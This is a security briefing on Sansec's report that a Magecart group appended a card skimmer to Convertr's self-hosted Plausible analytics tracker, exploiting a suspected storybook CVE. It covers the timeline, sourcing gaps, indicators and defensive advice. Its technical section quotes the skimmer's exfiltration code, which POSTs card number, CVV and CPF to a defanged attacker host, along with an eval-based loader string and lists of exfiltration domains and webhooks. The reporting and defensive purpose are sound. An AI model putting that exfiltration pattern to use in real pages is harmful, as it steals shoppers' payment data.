Sansec says a Magecart group hid a card skimmer in Convertr's analytics script, loaded on every checkout
Sansec says a card skimmer was appended to the analytics tracker on Convertr's own server, which every Convertr checkout loads, and sent card number, CVV and CPF to 1x0.is. From last clean copy to Convertr's reported removal is 79 hours 51 minutes (derived).
By Parminder Kumar Sharma · · 22 min read
79 hours 51 minutes from the last clean copy to the reported removal
Sansec, a Dutch ecommerce security firm, says the last clean copy of Convertr's analytics tracker that it observed was at 05:03 UTC on 24 October 2026. Its timeline says Convertr reported the skimmer removed at 12:54 UTC on 27 October. That is 79 hours 51 minutes (derived). Sansec says every Convertr checkout loads that tracker, that a card skimmer had been appended to it, and that the skimmer sent card number, expiry, CVV, cardholder name and CPF to a server at 1x0.is. Sansec also warns that browsers can keep an infected script for up to 24 hours, which would stretch the outer window to 103 hours 51 minutes (derived).
What that does not establish. It is not a count of victims, of cards or of payments. It is a ceiling set by two observations, not a record of when the file was changed: Sansec does not date the first change, and its own last clean copy and its detection at 23:22 UTC both fall on 24 October, so the file was changed on that day at the latest. No source read gives the number of Convertr shoppers who paid in the window, the number of records that reached 1x0.is, or any confirmed fraud. The suspected way in is a flaw Sansec says it could not confirm, because it has not seen Convertr's server logs. And everything about the fix rests on Sansec relaying what Convertr told it: no statement from Convertr itself was found.
This briefing reads Sansec's research page of 26 October (updated 27 October) in full, and treats it as the primary. It is the only place the skimmer code, the indicators and the timestamps are printed. BleepingComputer's report of 27 October, 20:57 UTC, and Infosecurity Magazine's report of the same day on a different Sansec finding were read as pointers and are cited as secondary. The vulnerability records (the GitHub advisories, the NVD entry and the CISA Known Exploited Vulnerabilities feed) and Convertr's own home page were read as well. Everything was read between 21:30 and 21:45 GMT on Tuesday 27 October 2026. Hours and day counts are this site's arithmetic and are labelled derived. Sansec sells ecommerce security products (a malware scanner, a service it describes as blocking known Magento attacks, and CSP monitoring), so it has a commercial interest in stories about stores being skimmed.
Stated and not stated: what Sansec's page establishes
The table sets what Sansec's page states, with BleepingComputer where it adds or differs, against what neither states. "Not stated" means not found in the pages read. It does not mean the information does not exist.
What Sansec (26 October 2026, updated 27 October) states about the Convertr incident, and what it does not. BleepingComputer (27 October) is named where it is the only source.
| The question | Stated | Not stated |
|---|---|---|
| Who found it? | Sansec's forensics team. Detection at 23:22 UTC on 24 October. | How Sansec came to look at Convertr's tracker. |
| What was changed? | The stock Plausible tracker file on Convertr's own analytics server, "followed by an obfuscated block of character codes that is decoded and run with eval". | The size of the added block, or the time of the first change. |
| What does it steal? | Card number, expiry, CVV, cardholder name and CPF, read from the payment form and from the requests the checkout sends to its payment API. | Any other field, or any data from outside checkout pages. |
| Where does it send it? | To 1x0.is, by a POST when the shopper places the order. | Who runs 1x0.is, where it is hosted, or what became of the data. |
| Who is behind it? | A "notorious Brazilian Magecart group" that Sansec has tracked since July 2024, identified by habits it says are unchanged: a pipe delimited record ending in a victim tag, Portuguese named endpoints, short .is exfiltration domains. | Any arrest, identity or evidence beyond Sansec's own pattern matching. This is Sansec's attribution. |
| How many stores? | "Dozens" of Brazilian fashion brands, all loading the tracker. Convertr's merchants have sold more than R$2 billion, Sansec says Convertr says. | A merchant list, shopper counts, or how many orders were placed in the window. |
| How did they get in? | Suspected: CVE-2026-8467, on a Plausible Community Edition 3.0 that Sansec says Convertr installed in 2025 and never updated. | Confirmation. Sansec: "We have not seen Convertr's server logs, so we cannot confirm that this was the entry point." |
| Has it been fixed? | Sansec: Convertr "has removed the skimmer and upgraded Plausible to a patched version", reported at 12:54 UTC on 27 October, and says it is notifying merchants, payment providers and the relevant authorities. Sansec confirmed the tracker clean at 13:08. | Convertr's own words. BleepingComputer says it asked Convertr for a statement and had no response when it published. |
| Were cards stolen? | The skimmer was built to send card data and was live on checkouts from 24 October. Sansec advises affected shoppers to ask their bank to block the card. | Any count of cards received, any fraud, or any bank or card scheme confirming a loss. |
BleepingComputer's report matches Sansec's on these points, including that the entry route is suspected and has not been confirmed. Its headline says the hackers "hijack" the script, which is a fair label for a changed file, but it is the secondary account. Where the two differ in detail, this briefing follows Sansec. Two such details: BleepingComputer's version of Convertr's notifications omits the authorities, and it converts the sales figure to dollars, where Sansec converts to euros.
How one changed file reached every checkout
Plausible is an open source analytics product, and Sansec says Convertr runs its free Community Edition on its own server at analytics.convertr.app.br. Plausible serves the tracker straight from a file on disk, and Sansec puts the consequence plainly: "An attacker who changes that file infects every site that embeds the tracker." Every Convertr merchant loads that one file. The change was an obfuscated block of character codes appended after the genuine script. It is decoded into a string and run by a call to eval.
The skimmer "only activates on checkout.convertr pages". That detail does two things. It keeps the injected code quiet on every page where nobody pays, and it means a scan of a merchant's home or product pages would see an ordinary analytics script with an odd tail. The second point is this site's inference, not Sansec's. Sansec does not say whether the skimmer tries to avoid scanners, and it describes no fingerprinting. It does say the group updated the code twice in two days: the version seen on 24 October used generic field patterns, and by 26 October a new version targeted the exact field names of Convertr's payment API.
The data leaves by an ordinary browser request. Sansec prints the call: a fetch POST to https://1x0.is/ws with a base64 encoded body, with the mode set to no-cors and keepalive set. The record is pipe delimited, ends in the tag ctr, and Sansec says that tag is a short victim label (here, Convertr). The same page lists the group's habits since 2024: Portuguese endpoint names such as cartao.php and pagamento.php, three letter .is domains that change every few months, and skimmers aimed at Brazilian payment methods (e.Rede, PagSeguro, Pagar.me, Mercado Pago, and a variant that swaps the PIX payment QR code for the attacker's). Until now, Sansec says, the group hacked stores one at a time, and Convertr is the first supply chain attack it has seen from it.
The clock, and the arithmetic
Intervals between the times Sansec prints (UTC). Every figure in the third column is derived by this site.
| From | To | Interval (derived) |
|---|---|---|
| Last clean copy, 24 Oct 05:03 | Sansec detects, 24 Oct 23:22 | 18 h 19 min |
| Sansec detects, 24 Oct 23:22 | Convertr reports removal, 27 Oct 12:54 | 61 h 32 min |
| Last clean copy, 24 Oct 05:03 | Convertr reports removal, 27 Oct 12:54 | 79 h 51 min |
| Still serving, 26 Oct 15:34 | Convertr reports removal, 27 Oct 12:54 | 21 h 20 min |
| Convertr reports removal, 27 Oct 12:54 | Sansec confirms clean, 27 Oct 13:08 | 14 min |
| Last clean copy, 24 Oct 05:03 | End of a 24 h cache tail, 28 Oct 12:54 | 103 h 51 min |
Two of those intervals matter for a reader. The first is 61 hours 32 minutes from detection to reported removal. In that time Sansec says it notified Convertr, received no response before publication, and that Convertr was still serving the skimmer at 15:34 UTC on 26 October. The second is the cache tail. If a shopper's browser fetched the infected file at the last moment, Sansec says it can run for up to 24 hours more, so the exposure of a shopper is not over when the file on the server is clean. Sansec's advice to shoppers who paid on a Convertr checkout since 24 October is to ask their bank to block and replace the card and to watch for fraud with their CPF.
The suspected entry: a CVE number that names a library, not Plausible
Sansec says Convertr installed Plausible Community Edition 3.0 in 2025 and never updated it, and that versions 3.0.0 through 3.2.0 carry a critical flaw: anyone can run commands on the server "through a component library that Plausible exposed at /storybook without a login". The records read back that up with one wrinkle. Plausible's own GitHub advisory is titled "Unauthenticated remote code execution via /storybook endpoint", rated Critical (CVSS 4.0 score 9.5), affects images from 3 up to but not including 3.2.1, and is patched in 3.2.1, which removes the endpoint. It lists the CVE as CVE-2026-8467 and says it relates to a second advisory. That second advisory, from the component library's maintainers, covers phoenix_storybook, versions above 0.5.0 and below 1.1.0, fixed in 1.1.0.
The NVD record for CVE-2026-8467 agrees: the vulnerable product it names is the phoenix_storybook library (0.5.0 up to 1.1.0), not Plausible. NVD shows it as published on 20 May 2026 with status Deferred, a CVSS 4.0 base score of 9.5 supplied by the CVE numbering authority that filed it, and a CISA assessment in the record of exploitation "poc", automatable "yes" and technical impact "total". The CISA Known Exploited Vulnerabilities feed, in the release dated 19:00 UTC on 27 October 2026, does not list CVE-2026-8467. So the number is correct for the flaw, but a search of vendor advisories for Plausible alone would not have found it under that number.
Dates for the fix, as three sources give them. Day counts to 24 October 2026 (the day Sansec first saw the skimmer) are derived by this site.
| Source | What it dates | Date | Days to 24 Oct (derived) |
|---|---|---|---|
| Sansec timeline | Plausible fixes CVE-2026-8467 in CE 3.2.1 | 15 May 2026 | 162 |
| NVD record | CVE published, library fixed in 1.1.0 per its advisory of the same day | 20 May 2026 | 157 |
| Plausible GitHub advisory | Advisory published, patched version 3.2.1 | 3 June 2026 | 143 |
The three dates are not the same event, and the pages read do not reconcile them: Sansec's 15 May is not on Plausible's advisory, which shows 3 June. Whichever is right, a fixed version had been public for between 143 and 162 days (derived) when the skimmer was found on a server Sansec says was still on 3.0. That is Sansec's claim about Convertr's version. It could not see the logs, and Convertr has not been read confirming it. The advisory's own advice for anyone on an affected version is to review access logs for requests to /storybook, and if any look suspicious, "assume the container environment was compromised and rotate all secrets accessible from the container".
The 953 stores report is a different Sansec finding
The same day, Infosecurity Magazine reported that attackers "have infected 953 online stores, mostly running Magento, with a JavaScript loader" that tells scanners apart from shoppers. That comes from a separate Sansec page, published on 24 October, about a loader domain called deepveindrilling.com. Nothing in either Sansec page says the two are the same actor or the same campaign. The Convertr page lists the 953 report only among its related research links and makes no statement about it. In the text of the 953 report, the words Convertr, Brazil and 1x0.is do not appear (a search of the saved page, derived), and it does not say what the loader finally delivers. This briefing therefore builds on the Convertr report alone and treats the 953 stores as a separate story.
Sansec's Convertr report (26 October 2026) against its deepveindrilling.com report (24 October 2026), as each page states. Infosecurity Magazine reports the second.
| The question | Convertr report | 953 stores report |
|---|---|---|
| Where is the code? | One tracker file on Convertr's own analytics server. | A loader in the cms_block database table of each infected Magento store. |
| Scale stated | "Dozens" of Brazilian fashion brands behind one platform. | 953 stores since July 2025, mostly Magento; 83 stores on the newest domain. |
| Purpose stated | Card number, expiry, CVV, name and CPF sent to 1x0.is. | Not known. Sansec "has not captured the final payload yet". |
| Hiding from scanners | Runs only on pages whose address contains checkout.convertr. No fingerprinting is described. | The server fingerprints the browser (automation flags, GPU, screen, time zone) and gives scanners nothing. |
| Actor named | A Brazilian Magecart group tracked since July 2024. | A campaign Sansec has tracked since July 2025, which it reported in March as the PolyShell mass attack. |
| Shared indicators | 1x0.is and the Convertr file. | deepveindrilling.com and four earlier loader domains. None of the Convertr report's domains appears. |
The scanner evasion in the 953 report, in words: the loader's newest version sends a fingerprint of the visitor's browser to the attacker's server before anything else happens. The fingerprint flags automated browsers, and the server decides what to return. When the urlscan.io service loaded an infected store with an automated Chrome browser, Sansec says it got an ordinary HTTP 200 and no added content. A different finding, on a different platform, with a different known purpose. An earlier briefing on this site covers another card skimming story for readers who want the wider pattern.
Analytics is a label, not a control
Several comfortable words do work in this story. The table sets each against what it leaves open. The last column's reasoning is this site's, drawn from what Sansec describes.
Labels around the Convertr incident, and what each does not establish.
| The label | What it suggests | What it does not establish |
|---|---|---|
| Analytics script | A passive counter that watches traffic. | Anything about its privileges. Loaded into a page, a script can read the same form fields the shopper types into. Sansec says this one read the card form. |
| Our own server, our own domain | Trusted, because it is ours. | That the file is unchanged. A list of allowed script hosts trusts the address, not the contents, and the changed file sat on the allowed host. (Inference.) |
| Open source, self hosted | Auditable, so safe. | That it is patched. Sansec says Plausible CE 3.0 was installed in 2025 and never updated, with a fix public for months. |
| Patched and clean | Over. | That every browser has stopped running it (up to 24 hours of cache, Sansec says), or that the server was not otherwise accessed. Sansec's advice for a server where /storybook was hit is to rebuild it and rotate its secrets. |
| Notifying the authorities | Handled. | What was reported, to whom, or when. Sansec relays that Convertr says it is doing this. No notice from Convertr was read. |
The point for a store owner is that a payment page runs every script on it with the same standing, whatever the script is called. A tag labelled analytics, marketing or chat that loads on checkout is a payment page script, and its owner has the same access to the card form as the shop does. Here the owner was not even a stranger. It was the platform, which is why every merchant was exposed at once.
One more word. BleepingComputer says Convertr "powers online stores and checkout systems for dozens of major fashion brands in the country" and handles R$2 billion in sales. Sansec says Convertr says its merchants have sold more than R$2 billion. Convertr's home page says, in Portuguese, that its ecosystem has moved "mais de 2 bilhões em vendas". None of them says how much of that went through a card checkout, so the R$2 billion measures the platform's reach, not exposure.
Technical details
Everything in the blocks below is printed by Sansec on its research page of 26 October 2026 (updated 27 October), read on 27 October 2026, except where a block says it is this site's own. Live infrastructure is defanged here (hxxps and [.]), which is the only change to the text. No working skimmer is printed: Sansec publishes the exfiltration call and the indicators, and the obfuscated body is not reproduced.
Block one is the exfiltration code Sansec prints. It builds one record from the stolen fields and sends it by an ordinary browser request. Sansec describes the record as card number, month, year, CVV, CPF and name, then a victim tag, and does not explain the variable letters. A defender uses it to know what to look for in browser and proxy logs: a POST to a third party host from a checkout page.
var raw = D.c + "|" + D.m + "|" + D.y + "|" + D.v + "|" + (D.p || "") + "|" + (D.n || "") + "|ctr";
fetch("hxxps://1x0[.]is/ws", {
method: "POST",
body: btoa(unescape(encodeURIComponent(raw))),
mode: "no-cors",
keepalive: true,
});
Block two is Sansec's indicator list for this incident: the exfiltration address, the infected file and its hash on 26 October, and two strings found in the skimmer. A defender searches web proxy, DNS and CSP report logs for the address, and compares the hash and the strings against any copy of the tracker held in a cache or a backup. The hash is of the infected file, so it will not match a clean one.
# Exfiltration
hxxps://1x0[.]is/ws
hxxps://1x0[.]is/ws/<base64>
# Infected file, sha256 on 26 October
hxxps://analytics[.]convertr[.]app[.]br/js/script.pageview-props.tagged-events.js
ee4618d24737eff785e5a267b55903d5ef6ff7ecbeb099347a67fee77734d7f7
# Skimmer strings
indexOf('checkout.convertr')
_s+=String.fromCharCode(_a[_i]);(0,eval)(_s)
Block three is the group's earlier infrastructure, which Sansec lists as "earlier exfiltration domains of the same group" and Discord webhooks it used, by webhook ID. The IDs are printed without their secret tokens and are only an address to look for; nothing here can be used to post to a webhook. A defender checks outbound logs for these names going back to July 2024, the date Sansec gives for the group's first activity, because a hit on any of them from a payment page on an older store points to the same operator.
# Earlier exfiltration domains of the same group
snf[.]is
kk[.]land
nmn[.]is
kof[.]one
anl[.]is
xsox[.]diy
eqp[.]is
shy[.]is
blz[.]is
tray[.]is
miorl[.]net
xwv[.]is
fasthook[.]app
antiddos-protection[.]net
# Discord webhooks used for exfiltration, by webhook ID
discord[.]com/api/webhooks/1349318491479605268
discord[.]com/api/webhooks/1349948669419327508
discord[.]com/api/webhooks/1351613753069801583
discord[.]com/api/webhooks/1398562090934993036
discord[.]com/api/webhooks/1414969348262596778
discord[.]com/api/webhooks/1557650706259902495
Block four is the vendor side for anyone who runs Plausible Community Edition themselves. The first lines are Plausible's own advisory text on the fix, the workaround and the signs of compromise (GitHub advisory GHSA-mhcv-h7gf-57cf, read 27 October 2026). The last lines are Sansec's advice for a server where requests to /storybook turn up. A defender checks the version first, then the logs, then the files.
Affected versions: >=3 and < 3.2.1
Patched versions: 3.2.1
Update any instances of Plausible Community Edition that are running affected versions to the image ghcr.io/plausible/community-edition:v3.2.1, which removes the vulnerable endpoint.
If you cannot update the image immediately, block access to the /storybook endpoint at your reverse proxy or firewall level.
Review your access logs for any requests to /storybook.
Indications of Compromise: Unexpected access to the /storybook endpoint; Unfamiliar processes or network connections originating from the plausible container
If you run Plausible CE yourself, upgrade to 3.2.1 or later and search your access logs for requests to /storybook. If you find any, rebuild the server, rotate its secrets and compare the files in priv/tracker/js/ with the official release.
Block five is this site's own, not Sansec's, and is labelled derived. It shows the shape of two browser controls that would have changed this incident: a script policy that names a hash rather than a host, and a limit on where the page may send data. The host names are placeholders. Whether either would work on a given checkout depends on how the platform builds its pages, which the sources do not describe, so treat it as a starting point for testing in report only mode first.
Content-Security-Policy-Report-Only:
script-src 'self' 'sha256-<hash of the exact file you serve>';
connect-src 'self' https://payments.example.com;
report-to csp-endpoint
What to do, in the order worth doing
Three lists follow: for a merchant or platform that serves scripts on payment pages, for anyone who runs Plausible Community Edition, and for shoppers. Where an item comes from Sansec or the Plausible advisory it says so. Everything else is this site's reasoning from what the sources describe. The sources read do not mention any card industry or regulatory standard, so none is cited.
Take this with you
If you run a store or a platform with scripts on payment pages, in order
- If you are on a hosted platform, ask it in writing to confirm that the tracker is clean. Sansec advises merchants on Convertr to do exactly that. Also ask when the infected file was first and last served to your pages. That second request is this site's addition.
- Tell your own payment provider yourself, with the dates. Sansec advises it, and says Convertr is notifying payment providers, but a merchant should not rely on that reaching the right desk. (The last clause is derived.)
- Make cached copies stop running. Change the script's address or file name so browsers fetch a fresh one. Sansec says an infected script can stay in a browser for up to 24 hours. (Derived.)
- List every script that loads on every payment page: its host, its owner, what it is for and a hash of the exact file. Include scripts on your own sub domains, because the changed file here sat on the platform's own host. (Derived.)
- Remove analytics, tag manager and marketing scripts from the payment step if you can. Sansec says the skimmer ran only on checkout pages, so a tag on that page was its carrier. (Derived.)
- Pin what runs. Use a script policy that names hashes or nonces rather than host names, and subresource integrity where you embed a static file. A host allowlist would have trusted the changed file. (Derived.)
- Limit where the page may send data. A connect policy that names only your payment provider and your own hosts would stop a browser posting card data to an unknown address. (Derived.)
- Run the policy in report only mode first and watch the reports. An unexpected host on a payment page is the early warning. Sansec sells such monitoring, so test any tool against your own pages.
- Compare the file you serve against the vendor's official release on a schedule, and alert on any difference. Sansec's own advice for the Plausible tracker is to compare the files in priv/tracker/js/ with the official release.
- Agree in advance who tells shoppers, by what channel and how fast, so the first notice does not depend on a researcher's blog post.
Take this with you
If you run Plausible Community Edition yourself, in order
- Check your version. Sansec says 3.0.0 through 3.2.0 are affected. The advisory says affected images are 3 up to but not including 3.2.1.
- Upgrade to 3.2.1 or later. If you cannot, block /storybook at the reverse proxy or firewall, as the advisory says.
- Search your access logs for any request to /storybook.
- If you find one, assume the server is compromised. Sansec says to rebuild it and rotate its secrets. The advisory says to rotate all secrets accessible from the container.
- Compare the files in priv/tracker/js/ with the official release, and check the hash of every tracker you serve.
- Do not serve the tracker on payment pages without the controls in the first list.
Take this with you
If you paid by card on a Brazilian store since 24 October 2026, in order
- Check whether the payment page address contained checkout.convertr. Sansec says this is the sign that the skimmer applied.
- If it did, ask your bank to block and replace the card now, as Sansec advises.
- Watch for fraud that uses your CPF as well as the card, as Sansec advises.
- Clear your browser cache before ordering again, because Sansec says an infected script can stay cached for up to 24 hours after the file is cleaned.
- Where you can, pay with a single use or disposable virtual card, as BleepingComputer suggests.
What could not be verified
- Convertr's own statement. None was found. Its home page carried no notice. What Convertr said about removal, patching and notification is Sansec's account, and BleepingComputer says Convertr had not replied to it.
- The entry route. Sansec calls CVE-2026-8467 a suspicion and says it has not seen the server logs.
- The fix dates. Sansec's 15 May for the Plausible fix is not on Plausible's advisory page, which shows 3 June. The two were not reconciled. The release date of version 3.2.1 itself was not read, because the release page that was tried returned a not found response.
- Victims. No count of shoppers, orders, cards or fraud cases. No bank, scheme or regulator statement.
- The group. The attribution to a Brazilian Magecart group is Sansec's, from patterns in its own records.
- The first change. Sansec does not date it. Only 24 October, by the clean copy and the detection, is inferred.
- Standards. Neither Sansec nor BleepingComputer mentions PCI DSS or any other requirement, so none is cited.
- BleepingComputer's dollar figure. It converts R$2 billion to $370M. Sansec converts it to about 320 million euros. Neither conversion was checked and neither is used here.
- Time stamped. Read between 21:30 and 21:45 GMT on 27 October 2026. A page, a hash or a clean verdict could change within hours, and the incident was still moving on the day.
The question that exposes the gap
If one file on a server you do not control changed tonight and ran on your payment page, which of your controls would notice before a shopper's bank did, and how many hours would pass before you could say which orders were in the window?
Key facts
Sources
- PrimarySansec Threat Research, Notorious Brazilian Magecart group hijacks Convertr checkouts via Plausible analytics, 26 October 2026 with the update of 27 October, read in full: the skimmer, the exfiltration code, the timeline, the indicators, the suspected CVE and Convertr's reported fixSansecaccessed 2026-10-27
- PrimarySansec Threat Research, deepveindrilling.com: Magento CMS block loader hits 953 stores, 24 October 2026, read in full: the separate campaign, the fingerprinting loader, the 953 figure and its indicatorsSansecaccessed 2026-10-27
- PrimaryAdvisory GHSA-mhcv-h7gf-57cf, Unauthenticated remote code execution via /storybook endpoint: Critical 9.5, affected 3 up to 3.2.1, patched 3.2.1, workaround, checks and signs of compromise; page date 3 June 2026Plausible (GitHub security advisory)accessed 2026-10-27
- PrimaryAdvisory GHSA-55hg-8qxv-qj4p for the phoenix_storybook library: affected above 0.5.0 and below 1.1.0, fixed in 1.1.0, published 20 May 2026 on its page. Read for the description only, no proof of concept is reproducedphenixdigital (GitHub security advisory)accessed 2026-10-27
- PrimaryNVD API record for CVE-2026-8467: the phoenix_storybook product and versions, published 20 May 2026, status Deferred, CVSS 4.0 9.5 from the CNA, CISA assessment of poc, automatable and totalNIST National Vulnerability Databaseaccessed 2026-10-27
- PrimaryKnown Exploited Vulnerabilities catalog feed, release dated 27 October 2026 19:00 UTC, 1,760 entries: CVE-2026-8467 not listedCISAaccessed 2026-10-27
- PrimaryConvertr home page: the claim to have moved more than 2 bilhões em vendas, and no incident notice on the page at the time readConvertraccessed 2026-10-27
- Reported byBleepingComputer, 27 October 2026, 20:57 UTC: report of the Sansec finding, the checkout.convertr advice and that Convertr had not replied. Used as a pointer and for the shopper advice, not for findingsBleepingComputeraccessed 2026-10-27
- Reported byInfosecurity Magazine, 27 October 2026: report of Sansec's 953 stores finding, read to separate that story from the Convertr oneInfosecurity Magazineaccessed 2026-10-27
- Reported byThis site's earlier briefing on a card skimming story, linked for one sentence of contextpk-sharma.comaccessed 2026-10-27


